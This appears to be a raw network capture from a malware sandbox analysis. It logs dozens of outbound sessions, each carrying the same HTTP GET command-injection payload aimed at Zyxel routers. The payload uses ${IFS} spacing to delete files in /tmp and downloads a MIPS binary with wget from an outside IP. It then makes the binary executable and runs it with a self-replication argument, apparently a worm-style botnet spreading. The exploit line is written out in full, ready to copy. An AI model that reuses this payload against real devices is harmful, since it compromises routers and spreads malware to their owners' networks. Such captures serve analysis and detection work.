                                                Jan 12, 2024 18:24:53.277259111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8756192.168.2.1342566212.227.91.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277309895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8757192.168.2.1354732120.193.241.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277352095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8758192.168.2.136016894.52.172.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277395010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8759192.168.2.133659878.238.1.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277446985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8760192.168.2.133532885.124.162.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277523994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8761192.168.2.1337820106.172.118.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277554989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8762192.168.2.134325858.212.196.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277628899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8763192.168.2.135804660.35.151.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277668953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8764192.168.2.134417258.239.170.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277707100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8765192.168.2.1344082205.136.218.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277761936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8766192.168.2.134826683.147.168.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277787924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8767192.168.2.1357926119.245.69.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277890921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8768192.168.2.1342224179.2.226.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277936935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8769192.168.2.1345494134.149.91.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277976990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8770192.168.2.1355450122.120.6.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278031111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8771192.168.2.1348394107.138.204.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278095007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8772192.168.2.1336166210.70.158.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278136969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8773192.168.2.1339998114.139.246.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278193951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8774192.168.2.1360760159.69.65.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278256893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8775192.168.2.1358122213.127.144.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278296947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8776192.168.2.134521675.87.40.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278381109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8777192.168.2.136042879.29.192.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278434038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8778192.168.2.1344852217.119.92.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278486013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8779192.168.2.134881858.182.95.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278548956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8780192.168.2.1355276208.80.14.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278603077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8781192.168.2.134656880.19.5.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278656960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8782192.168.2.1343206134.22.187.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278707027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8783192.168.2.1341448104.37.247.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278747082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8784192.168.2.1352452133.136.143.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278810024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8785192.168.2.1338614144.117.22.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278850079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8786192.168.2.135565477.167.226.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278913021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8787192.168.2.134262825.179.130.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.278956890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8788192.168.2.1353884108.62.89.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279011965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8789192.168.2.1342068178.247.197.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279081106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8790192.168.2.1353092150.185.28.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279109955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8791192.168.2.1348090156.58.134.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279186964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8792192.168.2.1350342110.222.17.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279252052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8793192.168.2.13333848.78.30.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279289961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8794192.168.2.1345180108.78.224.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279328108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8795192.168.2.135881678.82.39.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279412031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8796192.168.2.134695640.98.228.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279472113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8797192.168.2.133645043.227.242.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279524088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8798192.168.2.1350772116.33.93.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279596090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8799192.168.2.1339578160.25.77.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279649973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8800192.168.2.1334290124.147.164.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279666901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8801192.168.2.135571265.47.127.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279706001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8802192.168.2.1351892176.253.76.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279766083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8803192.168.2.1344288220.218.199.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279812098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8804192.168.2.1345740131.112.209.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279863119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8805192.168.2.1346622210.171.68.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279916048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8806192.168.2.136001672.207.163.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.279967070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8807192.168.2.133855687.88.38.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280031919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8808192.168.2.1342430128.40.156.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280077934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8809192.168.2.134003673.251.59.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280143976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8810192.168.2.1339154201.60.141.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280206919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8811192.168.2.134089293.157.151.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280241013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8812192.168.2.1349648190.177.153.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280332088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8813192.168.2.1355418134.241.18.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280380011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8814192.168.2.1349728103.135.86.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280416012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8815192.168.2.1336436116.156.148.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280474901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8816192.168.2.1358952197.210.63.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280528069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8817192.168.2.133995070.242.120.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280574083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8818192.168.2.1357820178.167.11.239443
                                                TimestampBytes transferredDirectionData
